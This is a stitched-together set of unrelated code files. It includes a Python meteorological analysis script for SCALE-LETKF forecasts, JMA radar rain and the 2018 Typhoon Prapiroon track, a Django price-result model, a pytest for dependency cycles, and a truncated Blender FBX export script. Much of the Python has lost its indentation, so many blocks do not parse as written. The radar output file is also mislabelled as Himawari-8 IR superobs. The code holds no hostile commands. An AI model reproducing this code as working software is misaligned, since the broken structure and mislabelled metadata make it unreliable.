fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
tk850_ = nc.variables["Tprs"][idx_e,idx_v850,:,:]
tk700_ = nc.variables["Tprs"][idx_e,idx_v700,:,:]
tk500_ = nc.variables["Tprs"][idx_e,idx_v500,:,:]
qv850_ = nc.variables["QVprs"][idx_e,idx_v850,:,:]
qv700_ = nc.variables["QVprs"][idx_e,idx_v700,:,:]
except:
print( "No time" )
tk850_ = nc.variables["Tprs"][idx_v850,:,:]
tk700_ = nc.variables["Tprs"][idx_v700,:,:]
tk500_ = nc.variables["Tprs"][idx_v500,:,:]
qv850_ = nc.variables["QVprs"][idx_v850,:,:]
qv700_ = nc.variables["QVprs"][idx_v700,:,:]
    # Vapor pressure (hPa) from mixing ratio, then dewpoint via the inverted
    # Tetens formula
    e700_ = qv700_ * 700.0 / ( epsilon + qv700_ ) # hPa
    td700_ = ( 243.5 * np.log( e700_ ) - 440.8 ) / ( 19.48 - np.log( e700_ ) ) + t0
    e850_ = qv850_ * 850.0 / ( epsilon + qv850_ ) # hPa
    td850_ = ( 243.5 * np.log( e850_ ) - 440.8 ) / ( 19.48 - np.log( e850_ ) ) + t0
    # K-index: ( T850 - T500 ) + Td850 - ( T700 - Td700 ), in deg C
    ki = tk850_ - tk500_ + td850_ - ( tk700_ - td700_ ) - t0
return( ki )
def get_grads_JMA(itime,FT,ACUM):
print("get_JMA",itime)
JMAr_gx = 2560
JMAr_gy = 3360
JMAr_top = "/data11/honda/SCALE-LETKF/JMA/radar/grads"
jetime = itime + timedelta(seconds=3600) * FT
jstime = itime + timedelta(seconds=600)
if not ACUM:
jstime += timedelta(seconds=3600) * (FT - 1)
print(jstime,jetime)
JMA_data_npz = os.path.join( JMAr_top, itime.strftime('%Y/%m/%d'),
"jmaradar_" + jstime.strftime('%Y%m%d%H%M%S') + "-" + jetime.strftime('%Y%m%d%H%M%S') + ".npz" )
JMA_data_nc = os.path.join( JMAr_top, itime.strftime('%Y/%m/%d'),
"jmaradar_" + jstime.strftime('%Y%m%d%H%M%S') + "-" + jetime.strftime('%Y%m%d%H%M%S') + ".nc" )
latmax = 20.004167 + 0.008333 * (JMAr_gy-1)
JMAr_lat = np.arange(20.004167, latmax,0.008333)
lonmax = 118.006250 + 0.012500 * (JMAr_gx-1)
JMAr_lon = np.arange(118.006250, lonmax,0.012500)
# npz is available?
ISNPZ = os.path.isfile(JMA_data_npz)
# nc is available?
ISNC = os.path.isfile(JMA_data_nc)
if ISNC:
JMArain2d,JMAr_lon,JMAr_lat = read_JMA_nc(JMA_data_nc)
return JMArain2d,JMAr_lon,JMAr_lat
if ISNPZ and not ISNC:
JMArain2d = np.load(JMA_data_npz)['arr_0']
print("read JMA data from: ", JMA_data_npz)
write_JMA_nc(JMA_data_nc,JMAr_lon,JMAr_lat,jstime,JMArain2d)
elif not ISNPZ and not ISNC:
JMArain2d = np.zeros((JMAr_gy,JMAr_gx))
jtime2 = jstime
while (jtime2 <= jetime):
jtime1 = jtime2 - timedelta(seconds=600)
fn1 = os.path.join( JMAr_top, jtime1.strftime('%Y/%m/%d'),
"jmaradar_" + jtime1.strftime('%Y%m%d%H%M%S') + ".grd")
fn2 = os.path.join( JMAr_top, jtime2.strftime('%Y/%m/%d'),
"jmaradar_" + jtime2.strftime('%Y%m%d%H%M%S') + ".grd")
for fn in fn1,fn2:
                try:
                    infile = open(fn)
                except OSError:
                    print("Failed to open",fn)
                    sys.exit()
                tmp2d = np.fromfile(infile, dtype=np.dtype('<f4'), count=JMAr_gx*JMAr_gy) # little endian
                input2d = np.reshape(tmp2d, (JMAr_gy,JMAr_gx))
                input2d[input2d < 0.0] = 0.0 #np.nan # undef is negative in JMA radar
                infile.close()
if fn == fn1:
rain2d = input2d * 0.5
else:
rain2d += input2d * 0.5
JMArain2d += rain2d / 6 # mm/h -> mm/10min
jtime2 += timedelta(seconds=600)
write_JMA_nc( JMA_data_nc, JMAr_lon, JMAr_lat, jstime, JMArain2d )
print("New file stored: ", JMA_data_nc)
#sys.exit()
return( JMArain2d, JMAr_lon, JMAr_lat)
def write_JMA_nc(JMA_data_nc,JMA_lon,JMA_lat,jstime,JMArain2d):
nc = Dataset(JMA_data_nc, "w", format="NETCDF4")
nc.createDimension("latitude", len(JMA_lat))
nc.createDimension("longitude", len(JMA_lon))
nc.createDimension("level", 1)
nc.createDimension("time", 1)
XX = nc.createVariable("longitude","f4",("longitude",))
XX.units = "degrees_east"
YY = nc.createVariable("latitude","f4",("latitude",))
YY.units = "degrees_north"
ZZ = nc.createVariable("level","i4",("level",))
ZZ.units = "km"
times = nc.createVariable("time","f4",("time",))
nc.description = "Superobs of Himawari-8 IR"
times.units = "hours since " + str(jstime)
times.calendar = "gregorian"
times[0] = 0
XVAR = nc.createVariable("RAIN","f4",("time","level","latitude","longitude"))
XVAR.units = "mm"
XVAR[:,:,:,:] = JMArain2d
XX[:] = JMA_lon
YY[:] = JMA_lat
ZZ[:] = 0
def read_JMA_nc(JMA_data_nc):
print(JMA_data_nc)
nc = Dataset(JMA_data_nc, "r", format="NETCDF4")
JMArain2d = nc.variables['RAIN'][0,0,:,:]
JMA_lon = nc.variables['longitude'][:]
JMA_lat = nc.variables['latitude'][:]
nc.close()
return( JMArain2d, JMA_lon, JMA_lat )
def draw_rec( m, ax, slon, elon, slat, elat, c='k', lw=5.0, ls='solid' ):
slat_l = np.linspace( slat, slat )
elat_l = np.linspace( elat, elat )
slon_l = np.linspace( slon, slon )
elon_l = np.linspace( elon, elon )
lon_l = np.linspace( slon, elon )
lat_l = np.linspace( slat, elat )
x_, y_ = m( lon_l, slat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
x_, y_ = m( lon_l, elat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
x_, y_ = m( slon_l, lat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
x_, y_ = m( elon_l, lat_l )
ax.plot( x_, y_, linewidth=lw, linestyle=ls, color=c )
def draw_prapiroon( m, ax, time=datetime( 2018, 7, 1, 0 ),
c='k', ms=5.0, marker='o', lw=10.0,
c_track='b', ms_track=2.0,
marker_track='o', label=None ):
lats = [ 19.8, 19.8, 19.8, 19.8, 19.8,
19.8, 19.8, 19.9, 20.4, 21.0,
21.8, 22.9, 23.6, 23.9, 24.5,
25.0, 25.4, 25.8, 26.1, 26.7,
27.2, 27.7, 28.2, 28.8, 29.5,
30.1, 30.7, 31.4, 32.0, 32.7,
33.2, 33.9, 34.4, 35.0, 35.6,
37.3, 39.6, 40.6, 40.9, 41.3,
41.7 ]
lons = [ 132.8, 132.2, 131.4, 130.8, 130.3,
129.9, 129.8, 129.7, 129.6, 129.4,
128.8, 128.2, 127.7, 127.3, 127.2,
127.0, 126.9, 126.8, 126.8, 126.8,
127.0, 127.1, 127.4, 127.7, 128.1,
127.9, 127.8, 127.9, 128.2, 128.6,
128.9, 129.3, 129.6, 130.2, 130.8,
132.5, 134.8, 136.6, 138.3, 139.5,
140.2, ]
dates = [ datetime( 2018, 6, 28, 0),
datetime( 2018, 6, 28, 6),
datetime( 2018, 6, 28, 12),
datetime( 2018, 6, 28, 18),
datetime( 2018, 6, 29, 0),
datetime( 2018, 6, 29, 6),
datetime( 2018, 6, 29, 12),
datetime( 2018, 6, 29, 18),
datetime( 2018, 6, 30, 0),
datetime( 2018, 6, 30, 6),
datetime( 2018, 6, 30, 12),
datetime( 2018, 6, 30, 18),
datetime( 2018, 7, 1, 0),
datetime( 2018, 7, 1, 3),
datetime( 2018, 7, 1, 6),
datetime( 2018, 7, 1, 9),
datetime( 2018, 7, 1, 12),
datetime( 2018, 7, 1, 15),
datetime( 2018, 7, 1, 18),
datetime( 2018, 7, 1, 21),
datetime( 2018, 7, 2, 0),
datetime( 2018, 7, 2, 3),
datetime( 2018, 7, 2, 6),
datetime( 2018, 7, 2, 9),
datetime( 2018, 7, 2, 12),
datetime( 2018, 7, 2, 15),
datetime( 2018, 7, 2, 18),
datetime( 2018, 7, 2, 21),
datetime( 2018, 7, 3, 0),
datetime( 2018, 7, 3, 3),
datetime( 2018, 7, 3, 6),
datetime( 2018, 7, 3, 9),
datetime( 2018, 7, 3, 12),
datetime( 2018, 7, 3, 15),
datetime( 2018, 7, 3, 18),
datetime( 2018, 7, 4, 0),
datetime( 2018, 7, 4, 6),
datetime( 2018, 7, 4, 12),
datetime( 2018, 7, 4, 18),
datetime( 2018, 7, 5, 0),
datetime( 2018, 7, 5, 6),
]
xs_, ys_ = m( lons, lats )
if lw > 0.0:
m.plot( xs_, ys_, color=c_track, markersize=ms_track,
marker=marker_track, linewidth=lw, )
if time == datetime( 2018, 6, 28, 0 ):
lat, lon, hpa = 19.8, 132.8, 1006.0
elif time == datetime( 2018, 6, 29, 0 ):
lat, lon, hpa = 19.8, 130.3, 998.0
elif time == datetime( 2018, 6, 30, 0 ):
lat, lon, hpa = 20.4, 129.6, 992.0
elif time == datetime( 2018, 7, 1, 0 ):
lat, lon, hpa = 23.6, 127.7, 985.0
elif time == datetime( 2018, 7, 2, 0 ):
lat, lon, hpa = 27.2, 127.0, 965.0
elif time == datetime( 2018, 7, 3, 0 ):
lat, lon, hpa = 32.0, 128.2, 965.0
elif time == datetime( 2018, 7, 4, 0 ):
lat, lon, hpa = 37.3, 132.5, 985.0
elif time == datetime( 2018, 7, 5, 0 ):
lat, lon, hpa = 41.3, 139.5, 992.0
# elif time == datetime( 2018, 7, 4, 18 ):
# lat, lon, hpa = 37.3, 132.5, 985.0
else:
print("No TC data")
return( np.nan, np.nan, np.nan)
x_, y_ = m( lon, lat )
if ms > 0.0:
m.plot( x_, y_, color=c, markersize=ms,
marker=marker, linewidth=lw, label=label )
return( lon, lat, hpa )
def get_dlm( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, dist=np.array([]) ):
#
# Get Deep Layer Mean (DLM) wind
hpa_l = [ 850, 700, 500, 300, 200 ]
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa_l[0] ) ).argmin()
        # dist = 1: within the averaging area
        #      = NaN: outside
        v = np.nanmean( nc.variables["Vprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
        u = np.nanmean( nc.variables["Uprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
for hpa in hpa_l[1:]:
idx_v = np.abs( ( prs - hpa ) ).argmin()
v += np.nanmean( nc.variables["Vprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
u += np.nanmean( nc.variables["Uprs"][idx_e,idx_v,:,:] * dist * prs[idx_v] )
u = u / np.sum( hpa_l )
v = v / np.sum( hpa_l )
return( u, v )
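# The deep-layer mean above is a pressure-weighted average over hpa_l:
# DLM wind = sum_i( p_i * mean(u_i) ) / sum_i( p_i ). A scalar sketch with
# hypothetical layer-mean winds:
def _demo_dlm_weighting():
    hpa_l = [ 850, 700, 500, 300, 200 ]
    u_l = [ 5.0, 8.0, 12.0, 20.0, 25.0 ] # hypothetical layer-mean winds (m/s)
    return( sum( p * u for p, u in zip( hpa_l, u_l ) ) / sum( hpa_l ) )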
def get_var( INFO, nvar="PW", stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, adt=timedelta(hours=24), hpa=500 ):
if nvar == "PW":
var_ = get_pw( INFO, stime=stime, vtime=vtime, m=m ) * 0.001 # kg/m2
elif nvar == "OLR":
var_ = get_olr( INFO, stime=stime, vtime=vtime, m=m )
elif nvar == "Q1":
var_ = get_q1( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "Q1_vg":
hpa1 = 700
hpa2 = 950
var1_ = get_q1( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa1 )
var2_ = get_q1( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa2 )
var_ = ( var1_ - var2_ ) / ( ( hpa1 - hpa2 ) * 1.e2 )
elif nvar == "VORT":
_, var_ = get_hdiv_curl( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "HDIV":
var_, _ = get_hdiv_curl( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "Z":
var_ = get_gph( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "RH":
var_ = get_rh( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "THE" or nvar == "EPT":
var_ = get_the( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "THEG":
v1_, v2_ = get_the_grad( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
var_ = np.sqrt( np.square( v1_ ) + np.square( v2_ ) )
elif nvar == "RAIN":
var_ = get_arain( INFO, stime=stime, vtime=vtime,
adt=adt, m=m )
elif nvar == "MFY" or nvar == "MFX":
q_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
if nvar == "MFY":
v_ = get_prsvar( INFO, nvar="Vprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
elif nvar == "MFX":
v_ = get_prsvar( INFO, nvar="Uprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
var_ = q_ * v_
elif nvar == "MSLP":
var_ = get_mslp( INFO, stime=stime, vtime=vtime, m=m ) * 0.01 # hPa
else:
var_ = get_prsvar( INFO, nvar=nvar+"prs", stime=stime, vtime=vtime, m=m, hpa=hpa )
return( var_ )
def get_pw( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
# print("time", fts/3600)
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
pw = nc.variables["PW"][idx_e,:,:]
except:
print( "No time" )
pw = nc.variables["PW"][:,:]
return( pw )
def get_hdiv_curl( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
u_ = get_prsvar( INFO, nvar="Uprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
v_ = get_prsvar( INFO, nvar="Vprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
u_[ u_ < -200 ] = np.nan
v_[ v_ < -200 ] = np.nan
[ dudy, dudx ] = np.gradient( u_, axis=(0,1) )
[ dvdy, dvdx ] = np.gradient( v_, axis=(0,1) )
div = ( dudx + dvdy ) * rDX
curl = ( dvdx - dudy ) * rDX
return( div, curl )
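# get_hdiv_curl estimates divergence and vorticity with centred differences:
# div = du/dx + dv/dy, curl = dv/dx - du/dy, where np.gradient returns
# differences per grid index and rDX (= 1/18000 m) converts them to per-metre.
# A minimal sketch on a hypothetical solid-body rotation field (divergence 0,
# vorticity 2 per grid index):
def _demo_hdiv_curl():
    y2d, x2d = np.meshgrid( np.arange(10.0), np.arange(10.0), indexing="ij" )
    u_, v_ = -y2d, x2d
    [ dudy, dudx ] = np.gradient( u_, axis=(0,1) )
    [ dvdy, dvdx ] = np.gradient( v_, axis=(0,1) )
    return( ( dudx + dvdy ) * rDX, ( dvdx - dudy ) * rDX )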
def get_prapiroon( time=datetime( 2018, 7, 1, 0 ) ):
lats = [ 19.8, 19.8, 19.8, 19.8, 19.8,
19.8, 19.8, 19.9, 20.4, 21.0,
21.8, 22.9, 23.6, 23.9, 24.5,
25.0, 25.4, 25.8, 26.1, 26.7,
27.2, 27.7, 28.2, 28.8, 29.5,
30.1, 30.7, 31.4, 32.0, 32.7,
33.2, 33.9, 34.4, 35.0, 35.6,
37.3, 39.6, 40.6, 40.9, 41.3,
41.7 ]
lons = [ 132.8, 132.2, 131.4, 130.8, 130.3,
129.9, 129.8, 129.7, 129.6, 129.4,
128.8, 128.2, 127.7, 127.3, 127.2,
127.0, 126.9, 126.8, 126.8, 126.8,
127.0, 127.1, 127.4, 127.7, 128.1,
127.9, 127.8, 127.9, 128.2, 128.6,
128.9, 129.3, 129.6, 130.2, 130.8,
132.5, 134.8, 136.6, 138.3, 139.5,
140.2, ]
dates = np.array(
[ datetime( 2018, 6, 28, 0),
datetime( 2018, 6, 28, 6),
datetime( 2018, 6, 28, 12),
datetime( 2018, 6, 28, 18),
datetime( 2018, 6, 29, 0),
datetime( 2018, 6, 29, 6),
datetime( 2018, 6, 29, 12),
datetime( 2018, 6, 29, 18),
datetime( 2018, 6, 30, 0),
datetime( 2018, 6, 30, 6),
datetime( 2018, 6, 30, 12),
datetime( 2018, 6, 30, 18),
datetime( 2018, 7, 1, 0),
datetime( 2018, 7, 1, 3),
datetime( 2018, 7, 1, 6),
datetime( 2018, 7, 1, 9),
datetime( 2018, 7, 1, 12),
datetime( 2018, 7, 1, 15),
datetime( 2018, 7, 1, 18),
datetime( 2018, 7, 1, 21),
datetime( 2018, 7, 2, 0),
datetime( 2018, 7, 2, 3),
datetime( 2018, 7, 2, 6),
datetime( 2018, 7, 2, 9),
datetime( 2018, 7, 2, 12),
datetime( 2018, 7, 2, 15),
datetime( 2018, 7, 2, 18),
datetime( 2018, 7, 2, 21),
datetime( 2018, 7, 3, 0),
datetime( 2018, 7, 3, 3),
datetime( 2018, 7, 3, 6),
datetime( 2018, 7, 3, 9),
datetime( 2018, 7, 3, 12),
datetime( 2018, 7, 3, 15),
datetime( 2018, 7, 3, 18),
datetime( 2018, 7, 4, 0),
datetime( 2018, 7, 4, 6),
datetime( 2018, 7, 4, 12),
datetime( 2018, 7, 4, 18),
datetime( 2018, 7, 5, 0),
datetime( 2018, 7, 5, 6),
] )
    # Return the track point closest in time to the requested time
    sec_l = [ np.abs( ( d - time ).total_seconds() ) for d in dates ]
    i = int( np.argmin( sec_l ) )
    return( lons[i], lats[i], dates[i] )
def get_q1( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
rho_ = nc.variables["DENSprs"][idx_e,idx_v,:,:]
omega_ = -nc.variables["Wprs"][idx_e,idx_v,:,:] * rho_ * grav
tk_ = nc.variables["Tprs"][idx_e,idx_v,:,:]
u_ = nc.variables["Uprs"][idx_e,idx_v,:,:]
v_ = nc.variables["Vprs"][idx_e,idx_v,:,:]
[ dTdy_, dTdx_ ] = np.gradient( tk_, axis=(0,1) )
dTdt_ = ( nc.variables["Tprs"][idx_e+1,idx_v,:,:] - nc.variables["Tprs"][idx_e-1,idx_v,:,:] ) / ( 12*3600.0 )
sigma_ = Rd * tk_ / ( cp*hpa*1.e2 ) - \
( nc.variables["Tprs"][idx_e,idx_v+1,:,:] - \
nc.variables["Tprs"][idx_e,idx_v-1,:,:] ) / \
( ( prs[idx_v+1] - prs[idx_v-1] )*1.e2 )
q1 = cp * dTdt_ - cp * ( omega_ * sigma_ - u_ * dTdx_ * rDX - v_ * dTdy_ * rDX )
return( q1 )
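# Note: get_q1 above appears to compute the apparent heat source Q1
# (cf. Yanai et al. 1973) on a pressure level: cp times the local temperature
# tendency (a centred difference over adjacent 6-hourly outputs, 12*3600 s)
# minus the adiabatic (omega * sigma) and horizontal temperature-advection
# terms.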
def def_cmap( nvar="RAIN", hpa=950, dth=24 ):
fac = 1.0
extend = "max"
cmap = plt.cm.get_cmap("jet")
tvar = nvar
if nvar == "RAIN":
levs = np.arange( 10, 155, 5 )
unit = "(mm/{0:}h)".format( dth )
elif nvar == "Q1_vg":
levs = np.arange( -100, 105, 5 )
unit = "()"
fac = 1.e6
extend = "both"
cmap = plt.cm.get_cmap("RdBu_r")
elif nvar == "HDIV":
levs = np.arange( -5, 6, 1 )
unit = r'(10$^5$s$^{-1}$)'
fac = 1.e5
extend = "both"
cmap = plt.cm.get_cmap("RdBu_r")
tvar = nvar + str( hpa )
elif nvar == "VORT":
levs = np.arange( -10, 12, 2 )
unit = r'(10$^{-5}$s$^{-1}$)'
fac = 1.e5
extend = "both"
cmap = plt.cm.get_cmap("RdBu_r")
tvar = nvar + str( hpa )
elif nvar == "Q1":
levs = np.arange( 10, 155, 5 )
unit = "()"
fac = 1.e2
elif nvar == "OLR":
cmap.set_under('gray',alpha=1.0)
levs = np.arange( 80, 305, 5 )
# cmap = plt.cm.get_cmap("Greys")
unit = r'(W/m$^2$)'
extend = "both"
elif nvar == "MSLP":
levs = np.arange( 0, 1400, 4)
unit = "(hPa)"
elif nvar == "Z":
levs = np.arange( 0, 13000, 20 )
unit = "(m)"
tvar = nvar + str( hpa )
elif nvar == "QV":
cmap = plt.cm.get_cmap("BrBG")
levs = np.arange( 0, 19.0, 1 )
if hpa < 850:
levs = np.arange( 0, 8.0, 0.5 )
if hpa < 700:
levs = np.arange( 0, 4.25, 0.25 )
levs = np.arange( 0, 6.25, 0.25 )
unit = r'(g/m$^3$)'
fac = 1.e3
tvar = nvar + str( hpa )
elif nvar == "PW":
levs = np.arange( 0, 72.5, 2.5)
#cmap = plt.cm.get_cmap("Blues")
cmap = plt.cm.get_cmap("hot_r")
unit = r'(mm/m$^{2}$)'
elif nvar == "THE" or nvar == "EPT":
levs = np.arange( 280, 340, 2)
unit = "(K)"
cmap = plt.cm.get_cmap("jet")
tvar = r'$\theta_e$' + str( hpa )
elif nvar == "T":
cmap = plt.cm.get_cmap("RdBu_r")
levs = np.arange( 284, 297, 1 )
unit = '(K)'
extend = 'both'
if hpa < 400:
levs = np.arange( 238, 251, 1 )
elif hpa < 600:
levs = np.arange( 264, 275, 1 )
tvar = nvar + str( hpa )
elif nvar == "U":
levs = np.arange( -36, 39, 3 )
cmap = plt.cm.get_cmap("RdBu_r")
extend = 'both'
unit = '(m/s)'
tvar = nvar + str( hpa )
elif nvar == "V":
levs = np.arange( -20, 22, 2 )
cmap = plt.cm.get_cmap("RdBu_r")
extend = 'both'
unit = '(m/s)'
tvar = nvar + str( hpa )
elif nvar == "RH":
cmap = plt.cm.get_cmap("BrBG")
levs = np.arange( 10, 95, 5 )
fac = 1.e2
extend = 'both'
unit = '(%)'
tvar = nvar + str( hpa )
return( cmap, levs, unit, extend, tvar, fac )
def read_etrack( stime=datetime(2018, 7, 1, 0),
ng=3,
dlon=2.0 ):
opath = "dat/track"
of = "track_s{0:}_ng{1:0=3}_dlon{2:}.npz".format( stime.strftime('%m%d'), int( ng ), dlon )
print( of )
data = np.load( os.path.join( opath, of ), allow_pickle=True )
tclat_l = data['tclat_l']
tclon_l = data['tclon_l']
tcmslp_l = data['tcmslp_l']
time_l = data['time_l']
return( np.array( tclon_l ), np.array( tclat_l ), np.array( tcmslp_l ),
np.array( time_l ) )
def get_steering_flow( INFO, tclon=130.0, tclat=30.0, m=1,
lon2d=np.zeros(1), lat2d=np.zeros(1),
stime=datetime( 2018, 7, 5, 0 ),
vtime=datetime( 2018, 7, 5, 0 ),
hpa_l = [ 850, 700, 500, ], # Velden and Leslie 1991WAF for weak TCs
tc_rad=5.0 ):
dist = np.sqrt( np.square( lon2d - tclon ) + np.square( lat2d - tclat ) )
j,i = np.unravel_index( np.argmin( dist ), dist.shape )
u = 0.0
v = 0.0
for p, hpa in enumerate( hpa_l ):
u_ = get_var( INFO, nvar="U", stime=stime, vtime=vtime, m=m+1, hpa=hpa )
v_ = get_var( INFO, nvar="V", stime=stime, vtime=vtime, m=m+1, hpa=hpa )
u_[ dist > tc_rad ] = np.nan
v_[ dist > tc_rad ] = np.nan
u += np.nanmean( u_ ) * hpa
v += np.nanmean( v_ ) * hpa
return( u/sum(hpa_l), v/sum(hpa_l) )
def get_rain_idx( INFO, slon=130.0, elon=137.5, slat=33.0, elat=36.0,
adt_h=24, mmax=50, vtime_ref=datetime( 2018, 7, 6, 0 ),
stime=datetime( 2018, 7, 2, 0 ) ):
lon2d, lat2d = get_lonlat( INFO, stime=datetime( 2018, 7, 1, 0 ) )
adt = timedelta( hours=adt_h )
rain_l = np.zeros( mmax )
# get reference
for m in range( mmax ):
rain_ = get_var( INFO, nvar="RAIN", stime=stime, vtime=vtime_ref, m=m+1, adt=adt )
rain_l[m] = np.mean( rain_[ (lon2d >= slon ) & (lon2d <= elon) & (lat2d >= slat) & (lat2d <= elat) ] )
mem_l = np.argsort( rain_l )[::-1]
rain_l = np.sort( rain_l )[::-1]
return( rain_l, mem_l )
def get_olr( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
# print("time", fts/3600)
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
olr = nc.variables["OLR"][idx_e,:,:]
except:
print( "No time" )
olr = nc.variables["OLR"][:,:]
return( olr )
def read_obs_letkf( time ):
otop = "/data_ballantine02/miyoshi-t/honda/SCALE-LETKF/BAIU2018_5.3.6/ncepobs_letkf"
fn = os.path.join( otop, "obs_" + time.strftime('%Y%m%d%H%M%S.dat') )
print(fn)
infile = open( fn )
data = np.fromfile( infile, dtype=np.dtype('>f4') )
    infile.close()
nobs = int( data.shape[0]/(8+2) ) # wk(8) + header + footer in one record
#obs_all = np.zeros((8,nobs))
#obs_all = data.reshape(10,nobs)
obs_all = data.reshape(nobs,10)
return( obs_all[:,1:9] )
def read_obsdep_letkf( time ):
otop = "/data_ballantine02/miyoshi-t/honda/SCALE-LETKF/BAIU2018_5.3.6"
idir = os.path.join( otop, time.strftime('%Y%m%d%H%M%S'), "obs" )
fn = os.path.join( idir, "obsdep.dat" )
print( fn )
infile = open( fn )
data = np.fromfile( infile, dtype=np.dtype('>f4') )
    infile.close()
nobs = int( data.shape[0]/(11+2) ) # wk(11) + header + footer in one record
#obs_all = np.zeros((8,nobs))
#obs_all = data.reshape(10,nobs)
obsdep_all = data.reshape(nobs,13)
return( obsdep_all[:,1:12] )
def read_Him8( time=datetime( 2018, 7, 5, 0 ) ):
fn = "/data9/honda/himawari_real/HIMAWARI-8/HISD/Hsfd/{0:}/00/B13/DLON0.02_DLAT0.02_HS_H08_{1:}_B13_FLDK.nc".format( time.strftime('%Y%m/%d/%Y%m%d0000'), time.strftime('%Y%m%d_%H00') )
with Dataset( fn, "r", format="NETCDF4") as nc:
tbb = nc.variables["tbb"][:]
lon = nc.variables["longitude"][:]
lat = nc.variables["latitude"][:]
lon2d, lat2d = np.meshgrid( lon, lat )
return( tbb, lon2d, lat2d )
def cmap_Him8():
colors1 = plt.cm.jet_r(np.linspace(0, 1, 128 ))
colors2 = plt.cm.binary(np.linspace(0., 1, 128 )) # w/k
colors = np.vstack((colors1, colors2))
cmap = mcolors.LinearSegmentedColormap.from_list('my_colormap', colors)
levs = np.arange( 200, 304, 4 )
return( cmap, levs )
|
from django.db import models
from .page import Page
class RunResult(models.Model):
page = models.ForeignKey(
Page,
related_name="run_results",
on_delete=models.CASCADE,
)
created_at = models.DateTimeField(auto_now_add=True)
def get_prices(self):
return [node.price for node in self.html_nodes.all()]
def __str__(self):
return (
f'<RunResult '
f'page="{self.page.get_readable_url()}" '
f'prices={str(self.get_prices())}>'
)
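# Note: get_prices above relies on a reverse relation named "html_nodes",
# i.e. it assumes another model (a hypothetical HtmlNode with a "price"
# field) declares a ForeignKey to RunResult with related_name="html_nodes".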
|
"""Tested only when using Annotated since it's impossible to create a cycle using default values"""
import pytest
from di.container import Container
from di.dependant import Dependant, Marker
from di.exceptions import DependencyCycleError
from di.typing import Annotated
# These methods need to be defined at the global scope for
# forward references to be resolved correctly at runtime
def dep1(v: "Annotated[int, Marker(dep2)]") -> None: # type: ignore
... # pragma: no cover
def dep2(v: "Annotated[int, Marker(dep1)]") -> None:
... # pragma: no cover
def test_cycle() -> None:
container = Container()
with container.enter_scope(None):
with pytest.raises(DependencyCycleError, match="are in a cycle"):
container.solve(Dependant(dep1), scopes=[None])
|
import bpy
import os
# The only difference between this version and the other one is that this one
# removes the mirror modifier when only meshes are exported; this is useful for
# importing into apps like Substance Painter, which is my workflow.
pathWay = bpy.data.filepath
objs = bpy.context.selected_objects
nameWay = os.path.splitext(pathWay)[0]
def ShowMessageBox(message = "", title = "Message Box", icon = 'INFO'):
def draw(self, context):
self.layout.label(text = message)
bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
types = set([obj.type for obj in objs])
print(f'saw types: {types}', nameWay,)
if 'ARMATURE' in types and 'MESH' in types:
theCall = 'Mesh with armature exported'
fileName = nameWay + '_armaMesh.fbx'
objINCLUDE = {'ARMATURE','MESH','OTHER'}
bake = False
elif 'MESH' in types:
    theCall = 'only meshes exported'
    fileName = nameWay + '_meshOnly.fbx'
    objINCLUDE = {'MESH','OTHER'}
    bake = False
    # Strip mirror modifiers from the selected meshes before export
    for obj in objs:
